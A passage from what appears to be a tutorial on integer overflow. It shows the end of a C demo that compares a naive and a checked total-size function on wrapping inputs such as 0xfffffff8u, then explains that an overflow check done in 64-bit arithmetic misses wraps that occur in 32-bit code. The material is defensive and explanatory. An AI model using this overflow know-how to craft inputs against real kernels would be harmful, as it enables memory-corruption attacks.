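                                     { 0xfffffff8u, 0, 0 } };
    for (size_t i = 0; i < sizeof ds / sizeof ds[0]; i++) {
        uint32_t sz = 0;
        int rc = total_size_checked(&ds[i], &sz);
        printf("naive=%u checked=%s\n", total_size_naive(&ds[i]),
               rc == 0 ? "ok" : "rejected");
    }
    return 0;
}
```

The second check has to be done in the width the target platform actually uses: testing the same expression in 64-bit arithmetic (or with size_t on a 64-bit build) passes the wrapping inputs, which is how a bug can be specific to the 32-bit kernel.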